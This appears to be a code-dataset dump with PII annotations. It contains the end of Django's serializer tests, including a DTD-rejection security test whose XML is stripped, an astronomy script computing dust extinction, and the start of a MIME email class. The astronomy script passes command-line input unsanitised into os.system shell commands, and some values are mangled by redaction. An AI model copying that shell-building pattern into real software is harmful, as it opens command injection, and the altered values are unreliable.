NullBooleanData, PositiveIntegerData, + PositiveSmallIntegerData, SlugData, SmallData, TextData, TimeData, + GenericData, Anchor, UniqueAnchor, FKData, M2MData, O2OData, + FKSelfData, M2MSelfData, FKDataToField, FKDataToO2O, M2MIntermediateData, + Intermediate, BooleanPKData, CharPKData, EmailPKData, FilePathPKData, + DecimalPKData, FloatPKData, IntegerPKData, IPAddressPKData, + GenericIPAddressPKData, PositiveIntegerPKData, + PositiveSmallIntegerPKData, SlugPKData, SmallPKData, + AutoNowDateTimeData, ModifyingSaveData, InheritAbstractModel, BaseModel, + ExplicitInheritBaseModel, InheritBaseModel, ProxyBaseModel, + ProxyProxyBaseModel, BigIntegerData, LengthModel, Tag, ComplexModel, + NaturalKeyAnchor, FKDataNaturalKey) + +# A set of functions that can be used to recreate +# test data objects of various kinds. +# The save method is a raw base model save, to make +# sure that the data in the database matches the +# exact test case. +def data_create(pk, klass, data): + instance = klass(id=pk) + instance.data = data + models.Model.save_base(instance, raw=True) + return [instance] + +def generic_create(pk, klass, data): + instance = klass(id=pk) + instance.data = data[0] + models.Model.save_base(instance, raw=True) + for tag in data[1:]: + instance.tags.create(data=tag) + return [instance] + +def fk_create(pk, klass, data): + instance = klass(id=pk) + setattr(instance, 'data_id', data) + models.Model.save_base(instance, raw=True) + return [instance] + +def m2m_create(pk, klass, data): + instance = klass(id=pk) + models.Model.save_base(instance, raw=True) + instance.data = data + return [instance] + +def im2m_create(pk, klass, data): + instance = klass(id=pk) + models.Model.save_base(instance, raw=True) + return [instance] + +def im_create(pk, klass, data): + instance = klass(id=pk) + instance.right_id = data['right'] + instance.left_id = data['left'] + if 'extra' in data: + instance.extra = data['extra'] + models.Model.save_base(instance, raw=True) + return [instance] + +def o2o_create(pk, klass, data): + instance = klass() + instance.data_id = data + models.Model.save_base(instance, raw=True) + return [instance] + +def pk_create(pk, klass, data): + instance = klass() + instance.data = data + models.Model.save_base(instance, raw=True) + return [instance] + +def inherited_create(pk, klass, data): + instance = klass(id=pk,**data) + # This isn't a raw save because: + # 1) we're testing inheritance, not field behavior, so none + # of the field values need to be protected. + # 2) saving the child class and having the parent created + # automatically is easier than manually creating both. + models.Model.save(instance) + created = [instance] + for klass,field in instance._meta.parents.items(): + created.append(klass.objects.get(id=pk)) + return created + +# A set of functions that can be used to compare +# test data objects of various kinds +def data_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + if klass == BinaryData and data is not None: + testcase.assertEqual(bytes(data), bytes(instance.data), + ""Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)"" % ( + pk, repr(bytes(data)), type(data), repr(bytes(instance.data)), + type(instance.data)) + ) + else: + testcase.assertEqual(data, instance.data, + ""Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)"" % ( + pk, data, type(data), instance, type(instance.data)) + ) + +def generic_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + testcase.assertEqual(data[0], instance.data) + testcase.assertEqual(data[1:], [t.data for t in instance.tags.order_by('id')]) + +def fk_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + testcase.assertEqual(data, instance.data_id) + +def m2m_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + testcase.assertEqual(data, [obj.id for obj in instance.data.order_by('id')]) + +def im2m_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + #actually nothing else to check, the instance just should exist + +def im_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + testcase.assertEqual(data['left'], instance.left_id) + testcase.assertEqual(data['right'], instance.right_id) + if 'extra' in data: + testcase.assertEqual(data['extra'], instance.extra) + else: + testcase.assertEqual(""doesn't matter"", instance.extra) + +def o2o_compare(testcase, pk, klass, data): + instance = klass.objects.get(data=data) + testcase.assertEqual(data, instance.data_id) + +def pk_compare(testcase, pk, klass, data): + instance = klass.objects.get(data=data) + testcase.assertEqual(data, instance.data) + +def inherited_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + for key,value in data.items(): + testcase.assertEqual(value, getattr(instance,key)) + +# Define some data types. Each data type is +# actually a pair of functions; one to create +# and one to compare objects of that type +data_obj = (data_create, data_compare) +generic_obj = (generic_create, generic_compare) +fk_obj = (fk_create, fk_compare) +m2m_obj = (m2m_create, m2m_compare) +im2m_obj = (im2m_create, im2m_compare) +im_obj = (im_create, im_compare) +o2o_obj = (o2o_create, o2o_compare) +pk_obj = (pk_create, pk_compare) +inherited_obj = (inherited_create, inherited_compare) + +test_data = [ + # Format: (data type, PK value, Model Class, data) + (data_obj, 1, BinaryData, six.memoryview(b""\x05\xFD\x00"")), + (data_obj, 2, BinaryData, None), + (data_obj, 5, BooleanData, True), + (data_obj, 6, BooleanData, False), + (data_obj, 10, CharData, ""Test Char Data""), + (data_obj, 11, CharData, """"), + (data_obj, 12, CharData, ""None""), + (data_obj, 13, CharData, ""null""), + (data_obj, 14, CharData, ""NULL""), + (data_obj, 15, CharData, None), + # (We use something that will fit into a latin1 database encoding here, + # because that is still the default used on many system setups.) + (data_obj, 16, CharData, '\xa5'), + (data_obj, 20, DateData, datetime.date(2006,6,16)), + (data_obj, 21, DateData, None), + (data_obj, 30, DateTimeData, datetime.datetime(2006,6,16,10,42,37)), + (data_obj, 31, DateTimeData, None), + (data_obj, 40, EmailData, dummy@email.com""), + (data_obj, 41, EmailData, None), + (data_obj, 42, EmailData, """"), + (data_obj, 50, FileData, 'file:///foo/bar/whiz.txt'), +# (data_obj, 51, FileData, None), + (data_obj, 52, FileData, """"), + (data_obj, 60, FilePathData, ""/foo/bar/whiz.txt""), + (data_obj, 61, FilePathData, None), + (data_obj, 62, FilePathData, """"), + (data_obj, 70, DecimalData, decimal.Decimal('12.345')), + (data_obj, 71, DecimalData, decimal.Decimal('-12.345')), + (data_obj, 72, DecimalData, decimal.Decimal('0.0')), + (data_obj, 73, DecimalData, None), + (data_obj, 74, FloatData, 12.345), + (data_obj, 75, FloatData, -12.345), + (data_obj, 76, FloatData, 0.0), + (data_obj, 77, FloatData, None), + (data_obj, 80, IntegerData, 123456789), + (data_obj, 81, IntegerData, -123456789), + (data_obj, 82, IntegerData, 0), + (data_obj, 83, IntegerData, None), + #(XX, ImageData + (data_obj, 90, IPAddressData, ""127.0.0.1""), + (data_obj, 91, IPAddressData, None), + (data_obj, 95, GenericIPAddressData, ""127.0.0.1""), + (data_obj, 96, GenericIPAddressData, None), + (data_obj, 100, NullBooleanData, True), + (data_obj, 101, NullBooleanData, False), + (data_obj, 102, NullBooleanData, None), + (data_obj, 120, PositiveIntegerData, 123456789), + (data_obj, 121, PositiveIntegerData, None), + (data_obj, 130, PositiveSmallIntegerData, 12), + (data_obj, 131, PositiveSmallIntegerData, None), + (data_obj, 140, SlugData, ""this-is-a-slug""), + (data_obj, 141, SlugData, None), + (data_obj, 142, SlugData, """"), + (data_obj, 150, SmallData, 12), + (data_obj, 151, SmallData, -12), + (data_obj, 152, SmallData, 0), + (data_obj, 153, SmallData, None), + (data_obj, 160, TextData, """"""This is a long piece of text. +It contains line breaks. +Several of them. +The end.""""""), + (data_obj, 161, TextData, """"), + (data_obj, 162, TextData, None), + (data_obj, 170, TimeData, datetime.time(10,42,37)), + (data_obj, 171, TimeData, None), + + (generic_obj, 200, GenericData, ['Generic Object 1', 'tag1', 'tag2']), + (generic_obj, 201, GenericData, ['Generic Object 2', 'tag2', 'tag3']), + + (data_obj, 300, Anchor, ""Anchor 1""), + (data_obj, 301, Anchor, ""Anchor 2""), + (data_obj, 302, UniqueAnchor, ""UAnchor 1""), + + (fk_obj, 400, FKData, 300), # Post reference + (fk_obj, 401, FKData, 500), # Pre reference + (fk_obj, 402, FKData, None), # Empty reference + + (m2m_obj, 410, M2MData, []), # Empty set + (m2m_obj, 411, M2MData, [300,301]), # Post reference + (m2m_obj, 412, M2MData, [500,501]), # Pre reference + (m2m_obj, 413, M2MData, [300,301,500,501]), # Pre and Post reference + + (o2o_obj, None, O2OData, 300), # Post reference + (o2o_obj, None, O2OData, 500), # Pre reference + + (fk_obj, 430, FKSelfData, 431), # Pre reference + (fk_obj, 431, FKSelfData, 430), # Post reference + (fk_obj, 432, FKSelfData, None), # Empty reference + + (m2m_obj, 440, M2MSelfData, []), + (m2m_obj, 441, M2MSelfData, []), + (m2m_obj, 442, M2MSelfData, [440, 441]), + (m2m_obj, 443, M2MSelfData, [445, 446]), + (m2m_obj, 444, M2MSelfData, [440, 441, 445, 446]), + (m2m_obj, 445, M2MSelfData, []), + (m2m_obj, 446, M2MSelfData, []), + + (fk_obj, 450, FKDataToField, ""UAnchor 1""), + (fk_obj, 451, FKDataToField, ""UAnchor 2""), + (fk_obj, 452, FKDataToField, None), + + (fk_obj, 460, FKDataToO2O, 300), + + (im2m_obj, 470, M2MIntermediateData, None), + + #testing post- and prereferences and extra fields + (im_obj, 480, Intermediate, {'right': 300, 'left': 470}), + (im_obj, 481, Intermediate, {'right': 300, 'left': 490}), + (im_obj, 482, Intermediate, {'right': 500, 'left': 470}), + (im_obj, 483, Intermediate, {'right': 500, 'left': 490}), + (im_obj, 484, Intermediate, {'right': 300, 'left': 470, 'extra': ""extra""}), + (im_obj, 485, Intermediate, {'right': 300, 'left': 490, 'extra': ""extra""}), + (im_obj, 486, Intermediate, {'right': 500, 'left': 470, 'extra': ""extra""}), + (im_obj, 487, Intermediate, {'right': 500, 'left': 490, 'extra': ""extra""}), + + (im2m_obj, 490, M2MIntermediateData, []), + + (data_obj, 500, Anchor, ""Anchor 3""), + (data_obj, 501, Anchor, ""Anchor 4""), + (data_obj, 502, UniqueAnchor, ""UAnchor 2""), + + (pk_obj, 601, BooleanPKData, True), + (pk_obj, 602, BooleanPKData, False), + (pk_obj, 610, CharPKData, ""Test Char PKData""), +# (pk_obj, 620, DatePKData, datetime.date(2006,6,16)), +# (pk_obj, 630, DateTimePKData, datetime.datetime(2006,6,16,10,42,37)), + (pk_obj, 640, EmailPKData, dummy@email.com""), +# (pk_obj, 650, FilePKData, 'file:///foo/bar/whiz.txt'), + (pk_obj, 660, FilePathPKData, ""/foo/bar/whiz.txt""), + (pk_obj, 670, DecimalPKData, decimal.Decimal('12.345')), + (pk_obj, 671, DecimalPKData, decimal.Decimal('-12.345')), + (pk_obj, 672, DecimalPKData, decimal.Decimal('0.0')), + (pk_obj, 673, FloatPKData, 12.345), + (pk_obj, 674, FloatPKData, -12.345), + (pk_obj, 675, FloatPKData, 0.0), + (pk_obj, 680, IntegerPKData, 123456789), + (pk_obj, 681, IntegerPKData, -123456789), + (pk_obj, 682, IntegerPKData, 0), +# (XX, ImagePKData + (pk_obj, 690, IPAddressPKData, ""127.0.0.1""), + (pk_obj, 695, GenericIPAddressPKData, ""127.0.0.1""), + # (pk_obj, 700, NullBooleanPKData, True), + # (pk_obj, 701, NullBooleanPKData, False), + (pk_obj, 720, PositiveIntegerPKData, 123456789), + (pk_obj, 730, PositiveSmallIntegerPKData, 12), + (pk_obj, 740, SlugPKData, ""this-is-a-slug""), + (pk_obj, 750, SmallPKData, 12), + (pk_obj, 751, SmallPKData, -12), + (pk_obj, 752, SmallPKData, 0), +# (pk_obj, 760, TextPKData, """"""This is a long piece of text. +# It contains line breaks. +# Several of them. +# The end.""""""), +# (pk_obj, 770, TimePKData, datetime.time(10,42,37)), +# (pk_obj, 790, XMLPKData, """"), + + (data_obj, 800, AutoNowDateTimeData, datetime.datetime(2006,6,16,10,42,37)), + (data_obj, 810, ModifyingSaveData, 42), + + (inherited_obj, 900, InheritAbstractModel, {'child_data':37,'parent_data':42}), + (inherited_obj, 910, ExplicitInheritBaseModel, {'child_data':37,'parent_data':42}), + (inherited_obj, 920, InheritBaseModel, {'child_data':37,'parent_data':42}), + + (data_obj, 1000, BigIntegerData, 9223372036854775807), + (data_obj, 1001, BigIntegerData, -9223372036854775808), + (data_obj, 1002, BigIntegerData, 0), + (data_obj, 1003, BigIntegerData, None), + (data_obj, 1004, LengthModel, 0), + (data_obj, 1005, LengthModel, 1), +] + +natural_key_test_data = [ + (data_obj, 1100, NaturalKeyAnchor, ""Natural Key Anghor""), + (fk_obj, 1101, FKDataNaturalKey, 1100), + (fk_obj, 1102, FKDataNaturalKey, None), +] + +# Because Oracle treats the empty string as NULL, Oracle is expected to fail +# when field.empty_strings_allowed is True and the value is None; skip these +# tests. +if connection.features.interprets_empty_strings_as_nulls: + test_data = [data for data in test_data + if not (data[0] == data_obj and + data[2]._meta.get_field('data').empty_strings_allowed and + data[3] is None)] + +# Regression test for #8651 -- a FK to an object iwth PK of 0 +# This won't work on MySQL since it won't let you create an object +# with a primary key of 0, +if connection.features.allows_primary_key_0: + test_data.extend([ + (data_obj, 0, Anchor, ""Anchor 0""), + (fk_obj, 465, FKData, 0), + ]) + +# Dynamically create serializer tests to ensure that all +# registered serializers are automatically tested. +class SerializerTests(TestCase): + def test_get_unknown_serializer(self): + """""" + #15889: get_serializer('nonsense') raises a SerializerDoesNotExist + """""" + with self.assertRaises(SerializerDoesNotExist): + serializers.get_serializer(""nonsense"") + + with self.assertRaises(KeyError): + serializers.get_serializer(""nonsense"") + + # SerializerDoesNotExist is instantiated with the nonexistent format + with self.assertRaises(SerializerDoesNotExist) as cm: + serializers.get_serializer(""nonsense"") + self.assertEqual(cm.exception.args, (""nonsense"",)) + + def test_unregister_unkown_serializer(self): + with self.assertRaises(SerializerDoesNotExist): + serializers.unregister_serializer(""nonsense"") + + def test_get_unkown_deserializer(self): + with self.assertRaises(SerializerDoesNotExist): + serializers.get_deserializer(""nonsense"") + + def test_json_deserializer_exception(self): + with self.assertRaises(DeserializationError): + for obj in serializers.deserialize(""json"", """"""[{""pk"":1}""""""): + pass + + @skipUnless(yaml, ""PyYAML not installed"") + def test_yaml_deserializer_exception(self): + with self.assertRaises(DeserializationError): + for obj in serializers.deserialize(""yaml"", ""{""): + pass + + def test_serialize_proxy_model(self): + BaseModel.objects.create(parent_data=1) + base_objects = BaseModel.objects.all() + proxy_objects = ProxyBaseModel.objects.all() + proxy_proxy_objects = ProxyProxyBaseModel.objects.all() + base_data = serializers.serialize(""json"", base_objects) + proxy_data = serializers.serialize(""json"", proxy_objects) + proxy_proxy_data = serializers.serialize(""json"", proxy_proxy_objects) + self.assertEqual(base_data, proxy_data.replace('proxy', '')) + self.assertEqual(base_data, proxy_proxy_data.replace('proxy', '')) + + +def serializerTest(format, self): + + # Create all the objects defined in the test data + objects = [] + instance_count = {} + for (func, pk, klass, datum) in test_data: + with connection.constraint_checks_disabled(): + objects.extend(func[0](pk, klass, datum)) + + # Get a count of the number of objects created for each class + for klass in instance_count: + instance_count[klass] = klass.objects.count() + + # Add the generic tagged objects to the object list + objects.extend(Tag.objects.all()) + + # Serialize the test database + serialized_data = serializers.serialize(format, objects, indent=2) + + for obj in serializers.deserialize(format, serialized_data): + obj.save() + + # Assert that the deserialized data is the same + # as the original source + for (func, pk, klass, datum) in test_data: + func[1](self, pk, klass, datum) + + # Assert that the number of objects deserialized is the + # same as the number that was serialized. + for klass, count in instance_count.items(): + self.assertEqual(count, klass.objects.count()) + +if connection.vendor == 'mysql' and six.PY3: + # Existing MySQL DB-API drivers fail on binary data. + serializerTest = expectedFailure(serializerTest) + + +def naturalKeySerializerTest(format, self): + # Create all the objects defined in the test data + objects = [] + instance_count = {} + for (func, pk, klass, datum) in natural_key_test_data: + with connection.constraint_checks_disabled(): + objects.extend(func[0](pk, klass, datum)) + + # Get a count of the number of objects created for each class + for klass in instance_count: + instance_count[klass] = klass.objects.count() + + # Serialize the test database + serialized_data = serializers.serialize(format, objects, indent=2, + use_natural_keys=True) + + for obj in serializers.deserialize(format, serialized_data): + obj.save() + + # Assert that the deserialized data is the same + # as the original source + for (func, pk, klass, datum) in natural_key_test_data: + func[1](self, pk, klass, datum) + + # Assert that the number of objects deserialized is the + # same as the number that was serialized. + for klass, count in instance_count.items(): + self.assertEqual(count, klass.objects.count()) + +def fieldsTest(format, self): + obj = ComplexModel(field1='first', field2='second', field3='third') + obj.save_base(raw=True) + + # Serialize then deserialize the test database + serialized_data = serializers.serialize(format, [obj], indent=2, fields=('field1','field3')) + result = next(serializers.deserialize(format, serialized_data)) + + # Check that the deserialized object contains data in only the serialized fields. + self.assertEqual(result.object.field1, 'first') + self.assertEqual(result.object.field2, '') + self.assertEqual(result.object.field3, 'third') + +def streamTest(format, self): + obj = ComplexModel(field1='first',field2='second',field3='third') + obj.save_base(raw=True) + + # Serialize the test database to a stream + for stream in (six.StringIO(), HttpResponse()): + serializers.serialize(format, [obj], indent=2, stream=stream) + + # Serialize normally for a comparison + string_data = serializers.serialize(format, [obj], indent=2) + + # Check that the two are the same + if isinstance(stream, six.StringIO): + self.assertEqual(string_data, stream.getvalue()) + else: + self.assertEqual(string_data, stream.content.decode('utf-8')) + +for format in serializers.get_serializer_formats(): + setattr(SerializerTests, 'test_' + format + '_serializer', curry(serializerTest, format)) + setattr(SerializerTests, 'test_' + format + '_natural_key_serializer', curry(naturalKeySerializerTest, format)) + setattr(SerializerTests, 'test_' + format + '_serializer_fields', curry(fieldsTest, format)) + if format != 'python': + setattr(SerializerTests, 'test_' + format + '_serializer_stream', curry(streamTest, format)) + + +class XmlDeserializerSecurityTests(TestCase): + + def test_no_dtd(self): + """""" + The XML deserializer shouldn't allow a DTD. + + This is the most straightforward way to prevent all entity definitions + and avoid both external entities and entity-expansion attacks. + + """""" + xml = '' + with self.assertRaises(DTDForbidden): + next(serializers.deserialize('xml', xml)) +",21669,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['NRP', 'django.core'], ['PERSON', 'DTDForbidden'], ['LOCATION', 'DecimalData'], ['LOCATION', 'FKData'], ['LOCATION', 'ProxyBaseModel'], ['PERSON', ""data['right""], ['NRP', ""data['extra""], ['PERSON', 'type(instance.data'], ['PERSON', 'type(instance.data'], ['LOCATION', 'generic_compare(testcase'], ['LOCATION', 'fk_compare(testcase'], ['LOCATION', 'o2o_compare(testcase'], ['LOCATION', 'pk_compare(testcase'], ['PERSON', 'm2m_obj'], ['LOCATION', 'inherited_obj'], ['PERSON', '\\xa5'], ['DATE_TIME', '20'], ['DATE_TIME', '21'], ['DATE_TIME', '30'], ['DATE_TIME', '31'], ['DATE_TIME', '40'], ['DATE_TIME', '41'], ['DATE_TIME', '42'], ['DATE_TIME', '50'], ['DATE_TIME', '51'], ['DATE_TIME', '52'], ['DATE_TIME', '60'], ['DATE_TIME', '61'], ['DATE_TIME', '62'], ['DATE_TIME', '70'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '71'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '72'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '73'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '74'], ['DATE_TIME', '75'], ['DATE_TIME', '76'], ['DATE_TIME', '77'], ['DATE_TIME', '80'], ['DATE_TIME', '123456789'], ['DATE_TIME', '81'], ['DATE_TIME', '82'], ['DATE_TIME', '83'], ['DATE_TIME', '90'], ['DATE_TIME', '91'], ['DATE_TIME', '95'], ['DATE_TIME', '96'], ['DATE_TIME', '101'], ['NRP', 'SlugData'], ['NRP', 'SlugData'], ['NRP', 'SlugData'], ['PERSON', 'tag3'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '410'], ['LOCATION', 'm2m_obj'], ['LOCATION', 'm2m_obj'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '440'], ['LOCATION', 'm2m_obj'], ['LOCATION', '441'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '443'], ['LOCATION', 'm2m_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['LOCATION', 'DecimalPKData'], ['LOCATION', 'DecimalPKData'], ['LOCATION', 'DecimalPKData'], ['DATE_TIME', '123456789'], ['LOCATION', '751'], ['NRP', 'inherited_obj'], ['NRP', 'inherited_obj'], ['NRP', 'inherited_obj'], ['DATE_TIME', '1100'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['PERSON', ""next(serializers.deserialize('xml""], ['URL', 'http://example.com/example.dtd""'], ['URL', 'django.co'], ['URL', 'django.core.se'], ['URL', 'django.core.serializers.ba'], ['URL', 'django.core.se'], ['URL', 'django.ht'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'instance.tags.cr'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'meta.parents.it'], ['URL', 'klass.objects.ge'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'obj.id'], ['URL', 'klass.objects.ge'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'data.it'], ['URL', 'testcase.as'], ['URL', 'six.me'], ['URL', 'email.com'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'email.com'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'connection.features.int'], ['URL', 'meta.ge'], ['URL', 'connection.features.al'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'cm.exception.ar'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.de'], ['URL', 'self.as'], ['URL', 'serializers.de'], ['URL', 'BaseModel.objects.cr'], ['URL', 'BaseModel.objects.al'], ['URL', 'ProxyBaseModel.objects.al'], ['URL', 'ProxyProxyBaseModel.objects.al'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'self.as'], ['URL', 'data.re'], ['URL', 'self.as'], ['URL', 'data.re'], ['URL', 'connection.co'], ['URL', 'klass.objects.co'], ['URL', 'Tag.objects.al'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'obj.sa'], ['URL', 'count.it'], ['URL', 'self.as'], ['URL', 'klass.objects.co'], ['URL', 'connection.ve'], ['URL', 'six.PY'], ['URL', 'connection.co'], ['URL', 'klass.objects.co'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'obj.sa'], ['URL', 'count.it'], ['URL', 'self.as'], ['URL', 'klass.objects.co'], ['URL', 'obj.sa'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'obj.sa'], ['URL', 'six.St'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'six.St'], ['URL', 'self.as'], ['URL', 'stream.ge'], ['URL', 'self.as'], ['URL', 'stream.content.de'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.de']]" +43,"import threading + +def ebv_list(list_submit,list_dict,i,ppid): + import os + lineindex = 0 + timehold = time.time() + list_out = [] + + out = open('/tmp/tmpf_' + str(i) + '_' + str(ppid),'w') + for line in list_submit: + tt = re.split('\s+',line) + ra = float(tt[0]) + dec = float(tt[1]) + EBV = calc_EBV(float(ra),float(dec),i) + list_out.append(EBV) + #print EBV + lineindex += 1 + out.write(str(EBV) + '\n') + if lineindex % 100 == 0: + print 'thread ' + str(i), lineindex, len(list_submit), time.time() - timehold + timehold = time.time() + list_dict[str(i)]['list_out'] = list_out + out.close() + +def calc_EBV(coord_in_ra,coord_in_dec,i): + + #coord_in_ra='12:51:26.28' + #coord_in_dec='27:07:42.' + coord = Equatorial( str(coord_in_ra*(24./360.)), str(coord_in_dec), epoch='2000') # input needs to be in HOURS as a STRING + g = Galactic(coord, epoch='2000') # output is in degrees not hours--it's latitude/longitude + + spt = re.split('\:',str(g.lat)) + #print spt, abs(float(spt[0])), float(spt[1])/60. + gallat = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. ) + #print gallat + #print g.long + spt = re.split('\:',str(g.long)) + #print spt + gallong = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. ) + #print gallong + + #coordtest = Equatorial(Galactic(g.long,g.lat, epoch='2000'), epoch='2000') + + output = commands.getoutput('dust_getval ' + str(gallong) + ' ' + str(gallat) + ' interp=y PI:KEY' + str(i) ) + spt = re.split('\s',output) + #print spt + EBV = spt[-1] + #print EBV, float(coord_in_ra), float(coord_in_dec) + return EBV + +class MyThread ( threading.Thread ): + def __init__ ( self, list_submit,list_dict, i, ppid): + self.i = i + self.list_submit = list_submit + self.list_dict = list_dict + self.ppid = ppid + threading.Thread.__init__(self) + + def run ( self ): + ebv_list(self.list_submit,list_dict,self.i,self.ppid) + return + +#add E(B-V) to ldac table +import re, commands, sys, bashreader, os +from ephem import * + +dict = bashreader.parseFile('progs.ini') + +table = sys.argv[1] + +import time +tempfile = '/tmp/outkey' +ebvfile = '/tmp/outebv' +os.system('rm ' + ebvfile) +ppid = os.getppid() +print ppid +command = ""ldactoasc -b -i "" + table + "" -t OBJECTS -k ALPHA_J2000 DELTA_J2000 > "" + ebvfile +print command +os.system(command) +list = [] +import re +outkey=open(tempfile,'w') +lines = open(ebvfile,'r').readlines() +number_interval = 4 +length_int = len(lines)/number_interval +start = 0 +my_threads = [] +list_dict = {} +for i in range(number_interval): + end = start + length_int + if i + 1 == number_interval: + list_submit = lines[start:] + else: + list_submit = lines[start:end] + start = end + list_dict[str(i)] = {'list_submit':list_submit} + #s = MyThread(list_submit,list_dict,i,ppid) + + #stat = os.fork() + print i, 'started' + s = os.fork() + if not s: + ebv_list(list_submit,list_dict,i,ppid) + sys.exit() + #s.start() + my_threads.append(s) + +print my_threads +#print threading.enumerate() +for s in my_threads: + os.waitpid(s,0) + +print 'done' + +list_out = [] +for i in range(number_interval): + list_out = list_out + list_dict[str(i)]['list_out'] + +print len(lines), len(list_out) +print lines[0:2], list_out[0:2] + + + + + +# READ IN COLUMN INFO + + + + + + + + + + + +for val in list_out: + outkey.write(str(val) + '\n') + + +outkey.close() + +command = ""asctoldac -i "" + tempfile + "" -o "" + tempfile + "".cat -c "" + dict['photconf'] + ""/EBV.conf -t OBJECTS "" +os.system(command) + +command = ""ldacjoinkey -o test -i "" + table + "" -p "" + tempfile + "".cat -t OBJECTS -k EBV"" +os.system(command) + +",3755,"[['PERSON', 'timehold'], ['PERSON', 'ra = float(tt[0'], ['PERSON', 'timehold'], ['LOCATION', 'Equatorial'], ['PERSON', 'gallat'], ['PERSON', 'gallong = float(spt[0'], ['PERSON', 'MyThread'], ['PERSON', 'self.list_dict = list_dict'], ['LOCATION', 'self.i'], ['URL', 'out.cl'], ['URL', 'g.la'], ['URL', 'g.la'], ['URL', 'commands.ge'], ['URL', 'threading.Th'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'threading.Th'], ['URL', 'self.li'], ['URL', 'bashreader.pa'], ['URL', 'progs.in'], ['URL', 'sys.ar'], ['URL', 'os.sy'], ['URL', 'os.ge'], ['URL', 'os.sy'], ['URL', 'os.fo'], ['URL', 'os.fo'], ['URL', 's.st'], ['URL', 'outkey.cl'], ['URL', 'EBV.co'], ['URL', 'os.sy'], ['URL', 'os.sy']]" +44,"#coding=utf-8 + +import smtplib +from datetime import datetime +from hashlib import md5 +import sys, re +from .misc import * +from .parts import * + +from collections import OrderedDict as odict + +class Mimemail(): + + def __init__(self, **kwargs): + self.headers = odict() + self.headers['MIME-Version'] = '1.0' + self.headers['From'] = MM_DEFAULT_FROM + self.headers['Date'] = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT') + + self.body = '' + self.html = None + self.text = None + self.images = [] + self.attachments = [] + self.charset = 'UTF-8' + self.recipients = {} + self.from_email = 'root@localhost' + self.kw = kwargs + + def set_from(self, from_email, from_name): + self.headers['From'] = '%s <%s>' % (encode_header(from_name, self.charset), from_email) + self.from_email = from_email + + def set_html(self, html): + self.html = html + + def set_text(self, text): + self.text = text + + def add_image(self, image): + self.images.append(image) + + def add_attachment(self, att): + self.attachments.append(att) + + def set_subject(self, subject): + self.subject = subject + + def create_images_part(self, boundary): + lines = [] + for image in self.images: + lines.extend([ + MM_DEFAULT_CRLF, + '--%s%s' % (boundary, MM_DEFAULT_CRLF), + image.get_part_header(), + MM_DEFAULT_CRLF, + MM_DEFAULT_CRLF, + image.get_part_body() + ]) + + return ''.join(lines) + + def create_attachments_part(self, boundary): + lines = [] + for att in self.attachments: + lines.extend([ + MM_DEFAULT_CRLF, + '--%s%s' % (boundary, MM_DEFAULT_CRLF), + att.get_part_header(), + 